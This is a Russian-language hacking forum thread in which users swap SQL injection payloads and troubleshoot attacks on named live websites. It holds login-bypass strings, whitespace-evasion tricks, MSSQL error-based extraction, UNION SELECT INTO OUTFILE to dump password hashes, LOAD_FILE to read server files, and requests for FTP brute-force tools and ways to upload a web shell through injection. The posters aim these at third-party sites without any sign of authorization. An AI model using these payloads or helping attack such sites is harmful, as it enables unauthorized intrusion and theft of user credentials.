Ваши вопросы по уязвимостям.

1'or'1'='1'
1)or(1)=(1)
1'or'1'='1
и т.д

Пробелы как таковые не нужны вообще

 

Аналоги ПРОБЕЛА:
+ или %2B

 

хм. +, либо еще /**/ бывает прокатывает

 

Если инъекция в пост запросе, ты плюсы ставишь? На сколько я заметил, там плюc канает за плюс и тд то есть:
1' or 1=(select user)+char(0x7e) выдаст : 'dbo~'

На недельке как налажу регексы планирую выложить свой софт для mssql инъекций.

 

Почему-то не получается. так и так пробовал.
http://www.nuovemozioni.com/login.asp

 

ник') or 1=1--(пробел)

 

может не в тему чуток..но всё таки..чем напарсить линки для брута фтп?
да и Брутусае2 залейте...а то удалил его..

 

Где можно почитать про заливку шелла через SQL Inj ?
конкретно про это не нашёл подходящих статей(

 

Login: ' or 1=(@@version)--
Pwd: qwerty

exec et_CustomerLOGIN 'CE2381685624496CAE568A1C9FF9F951', '' or 1=(@@version)--', 'qwery'

Microsoft OLE DB Provider for SQL Server error '80040e14'

Incorrect syntax near the keyword 'or'.

Вот часть запроса выудил. Как можно сформировать запрос чтоб получить результат?

 

SHS попробуй войти вод админом )

 

столкнулся с проблемой, делаю union select into outfile '1.txt' оно его сохраняет в папку var/db/mysql/ но это на уровень выше чем то где находится сам сайт, короче вот так http://aaa.ru/1.txt на него не зайдеш он где то ближе лежит, вопрос как узнать где лежит сайт? там можно без полного пути, начиная с var/

 

InvisibleSM,
а) иногда помогает LOAD_FILE('/') - оно выведет листинг корня и т.п.
б) почитать конфиги апача в стандартных местах

 

а)Если только фряха если я не ошибаюсь...
насчёт б согласен..можно ещё поискать на сайте раскрытие путей....ну или погуглить этот сайт на ошибки ...насчтё конфигов вот темка
https://forum.antichat.ru/showthread.php?t=49775

 

InvisibleSM, Прорекламирую мою тулзу тебе в помощь =\

https://forum.antichat.ru/thread79411.html

 

hi

sorry for english

is this hackable

http://forums.microsoft.com/SamVaad/ShowPost.aspx?siteid=43&PostID=4186769

waitting>>>>>>>>>>>

 

http://forums.microsoft.com/SamVaad/ShowPost.aspx?siteid=43'&PostID=4186769 hmmmm
it may well be that filtration ' ! Not good!!!

-------------------------------------------
No man!!!it cannot be said : this unhackable! Search some different ways!!!

 

блин забыл самое главное написать, там нет выводимых полей там бага в мейл поле при регистрации поэтому только аут файл могу сделать

во что пишу

' union select passhash from users where id=1 into outfile '/tmp/1.txt'/* -- @bla.ua

а прочитать терь как, хз

на ошибки гуглил, нету

 

Народ помогите разобрать что то непонимаю что к чему http://www.viper-shop.dk/category.php?id=180'

Ругается что не правильный синтаксис и все тут. Уже все перепробовал. В чем ошибка?

 

http://www.viper-shop.dk/category.php?id=180+and+1=1

интересно что же ты перепробовал... Не знаешь - не лезь или учись...